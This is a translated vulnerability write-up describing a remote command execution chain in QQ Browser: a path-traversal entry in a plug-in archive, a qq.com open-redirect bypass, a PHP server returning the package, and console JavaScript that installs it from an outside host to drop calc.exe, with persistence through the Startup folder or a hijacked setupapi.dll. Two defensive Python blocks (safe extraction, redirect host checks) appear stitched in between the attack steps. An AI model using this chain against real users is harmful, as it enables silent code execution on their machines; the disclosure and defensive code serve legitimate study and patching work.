QQ Browser Remote Arbitrary Command Execution Vulnerability (with analysis and use)

Source: Internet
Author: User


1. In QQ Browser, any web page under the qq.com domain is permitted to call certain API interfaces exposed on window.external, such as:


Install a plug-in: window.external.extension.installExtension

Uninstall a plug-in: window.external.getExtension("").uninstallExtension



2. The usage of window.external.extension.installExtension is as follows:

window.external.extension.installExtension("plug-in GUID", "plug-in URL", "plug-in version", callback function);





An example call:

window.external.extension.installExtension("{CD36E3DB-304A-48EF-A8A2-D873F608D2AE}", "http://xxxx.qq.com/AAAAAAAA.qrx", "8.0.1.19", function(){ alert("install ok"); });





The plug-in URL must be an address in the qq.com domain.



3. It would seem, then, that we can install any plug-in we like. However, QQ Browser's plug-in implementation verifies the JS files called by the plug-in, and any other files containing functional code, which makes it impossible to package malicious JS code into the plug-in.



4. However, a QQ Browser plug-in (.qrx) is itself a compressed archive. When a plug-in is installed remotely, QQ Browser first decompresses the archive and only then performs the verification from the previous step. The verification step is sound; but is the extraction step?



5. We downloaded a QQ Browser plug-in, opened it in 7-Zip and dragged a calc.exe into the archive.

Then we renamed calc.exe inside the archive to:

../../../../../../../../../calc.exe

This is equivalent to packing a file at the following path inside the archive (the nine "../" components climb from the extension's version directory back up to the drive root):

C:\Users\USERNAME\AppData\Roaming\Tencent\QQBrowser\Extensions8\{token}\8.0.0.2\../../../../../../../../../calc.exe
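The extraction flaw in steps 4 and 5 is the classic archive path traversal ("Zip Slip"): an entry name containing "../" components is written relative to the extension directory without checking where it actually lands. The following Python is an added example, not code from this write-up or from QQ Browser, showing how an installer should validate every archive entry against the extraction root before writing it. The archive it builds is a constructed sample with one legitimate entry and one traversal entry modelled on the renamed calc.exe above; the directory layout Extensions8\{token}\8.0.0.2 mirrors the path in the write-up but is created under a temporary directory, and the function and constant names are the example's own.

```python
import io
import tempfile
import zipfile
from pathlib import Path, PurePosixPath


def is_safe_entry(root: Path, name: str) -> bool:
    """Return True only if archive entry `name` would be written inside `root`."""
    # Reject absolute names and Windows drive-letter prefixes outright.
    if name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
        return False
    # Zip entry names nominally use '/', but be tolerant of backslashes.
    parts = PurePosixPath(name.replace("\\", "/")).parts
    if ".." in parts:
        return False
    # Belt and braces: resolve the final path and confirm it stays under root.
    root_resolved = root.resolve()
    target = root_resolved.joinpath(*parts).resolve()
    return target == root_resolved or root_resolved in target.parents


def safe_extract(archive_bytes: bytes, root: Path) -> tuple[list[str], list[str]]:
    """Extract only entries that pass is_safe_entry; return (extracted, rejected) names."""
    extracted: list[str] = []
    rejected: list[str] = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if not is_safe_entry(root, info.filename):
                rejected.append(info.filename)
                continue
            parts = PurePosixPath(info.filename.replace("\\", "/")).parts
            dest = root.joinpath(*parts)
            if info.is_dir():
                dest.mkdir(parents=True, exist_ok=True)
                continue
            dest.parent.mkdir(parents=True, exist_ok=True)
            dest.write_bytes(zf.read(info))
            extracted.append(info.filename)
    return extracted, rejected


# Constructed sample: a minimal "plug-in" archive with one legitimate entry and
# one traversal entry modelled on the write-up's renamed calc.exe (nine "../").
TRAVERSAL_NAME = "../../../../../../../../../calc.exe"
# Hypothetical extension root used only for the stand-alone entry checks.
EXT_ROOT = Path("ext")


def build_demo_qrx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", '{"name": "demo plug-in"}')
        zf.writestr(TRAVERSAL_NAME, b"placeholder, not a real executable")
    return buf.getvalue()


def demo() -> tuple[list[str], list[str]]:
    """Extract the sample archive into a throwaway tree shaped like the write-up's path."""
    with tempfile.TemporaryDirectory() as tmp:
        # Hypothetical layout mirroring Extensions8\{token}\8.0.0.2 under a temp dir.
        root = Path(tmp) / "Extensions8" / "{token}" / "8.0.0.2"
        root.mkdir(parents=True)
        extracted, rejected = safe_extract(build_demo_qrx(), root)
        # Nothing may have escaped the extension directory.
        assert not (Path(tmp) / "calc.exe").exists()
        assert (root / "manifest.json").exists()
        return extracted, rejected


if __name__ == "__main__":
    print(demo())
```

The check deliberately combines a syntactic rule (no ".." component, no absolute or drive-qualified name) with a semantic one (the resolved destination must still be under the root), so that neither backslash-separated names nor paths such as "sub/../../calc.exe" slip through.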



6. Place the modified 1.qrx file and an index.php in the root directory of our local test server (x.com):

/1.qrx

/index.php

The index.php code is:

<?php echo file_get_contents("./1.qrx"); ?>





To bypass the domain-name restriction on the plug-in URL in window.external.extension.installExtension, we used a 302 redirect found in an earlier WooYun vulnerability report:

http://tixing.qq.com/cgi-bin/jump?url=http://xxx.com/

The url parameter of this redirect is also subject to a domain-name check, but it is easily bypassed like this:

http://tixing.qq.com/cgi-bin/jump?url=http://x.com?qq.com/

This is also the plug-in URL we finally constructed. The request chain is:

http://tixing.qq.com/cgi-bin/jump?url=http://x.com?qq.com/

--> redirects to:

http://x.com?qq.com/

--> which is equivalent to http://x.com/index.php

--> which returns the contents of 1.qrx
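The redirect bypass above works because the url parameter check accepts http://x.com?qq.com/ even though its host is x.com; the write-up does not show the check itself, so treating it as a substring match on the whole URL is an assumption made here. The following Python is an added example, not code from this write-up or from Tencent, contrasting such a naive check with one that parses the URL, compares the hostname against the allowed suffix on a label boundary, and is applied to every hop of a redirect chain rather than only the first URL (the installer's apparent mistake). The function names and the sample chain are the example's own.

```python
from urllib.parse import urlsplit

# Suffix the installer is supposed to enforce: plug-in URLs must be under qq.com.
ALLOWED_SUFFIX = "qq.com"


def naive_is_qq_url(url: str) -> bool:
    """The kind of check the write-up's bypass defeats: a substring match on the whole URL.

    Assumed here; the write-up only shows that "http://x.com?qq.com/" is accepted.
    """
    return ALLOWED_SUFFIX in url


def host_allowed(url: str) -> bool:
    """Parse the URL and compare its hostname to the allowed suffix on a label boundary."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    # urlsplit stops the authority at '/', '?' or '#', so "http://x.com?qq.com/" yields host x.com.
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False
    # Require either the bare domain or a subdomain; "evil-qq.com" must not pass.
    return host == ALLOWED_SUFFIX or host.endswith("." + ALLOWED_SUFFIX)


def download_chain_allowed(hops: list[str]) -> bool:
    """Every hop of a redirect chain (initial URL plus each Location target) must pass.

    Checking only the first URL is exactly what the tixing.qq.com 302 jump exploits.
    """
    return bool(hops) and all(host_allowed(h) for h in hops)


# Constructed sample chain reproducing the write-up's redirect.
WRITEUP_CHAIN = [
    "http://tixing.qq.com/cgi-bin/jump?url=http://x.com?qq.com/",
    "http://x.com?qq.com/",
]


if __name__ == "__main__":
    for hop in WRITEUP_CHAIN:
        print(hop, "naive:", naive_is_qq_url(hop), "parsed:", host_allowed(hop))
    print("chain allowed:", download_chain_allowed(WRITEUP_CHAIN))
```

Run stand-alone, the first hop passes both checks, the second passes only the naive one, and the chain as a whole is rejected; applying host_allowed to each redirect target is what closes the open-redirect route to an attacker-controlled package.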



7. Open a QQ website, for example qzs.qq.com/123.



Then press F12 to open the script console and run the test code below (it writes a calc.exe file to the root of the C: drive):

(function () {
  var isWin7 = /NT\s+6/.test(navigator.userAgent);
  var guid = "{CD36E3DB-304A-48EF-A8A2-D873F608D2AE}";
  var url = "http://tixing.qq.com/cgi-bin/jump?url=http://appmaker.sinaapp.com?.qq.com/1.qrx";
  // Remove any previous copy of the plug-in first, then install the crafted package.
  window.external.getExtension("").uninstallExtension(guid, function () {
    if (isWin7) {
      window.external.extension.installExtension(guid, url, "8.0.1.19", function () { alert("demo win7"); });
    } else { // xp
      window.external.extension.installExtension(guid, url, "8.0.1.19", function () { alert("demo xp"); });
    }
  });
})();





The result:

You can see that (on Windows 7, with UAC disabled), once installExtension has been called, a calc.exe file really is written to the root of the C: drive.

The same holds on XP.

8. The last thing needed is an XSS in a qq.com domain. We will not look for one here, because the focus of this vulnerability is no longer the XSS. If you need one as a replacement, leave a message.

Two further notes:

1. On Windows 7, when UAC is disabled, the Startup directory is writable, so calc.exe can instead be renamed to:

../../../../../../../../../ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/calc.exe

On XP, however, the Startup directory path contains Chinese characters, which are not handled correctly during decompression.

2. On XP, commands can nevertheless be executed via other minor issues, such as DLL hijacking.

If QQ Browser is installed in its default location, create a DLL of your own and rename it:

../../../../../../../../../Program Files/Tencent/QQBrowser/setupapi.dll

When a user visits the malicious web page and the malicious plug-in package is installed, a setupapi.dll is dropped into the QQ Browser directory; the next time the browser starts, the DLL is hijacked, for example:

Solution:

Fix the installation code of the plug-in package.
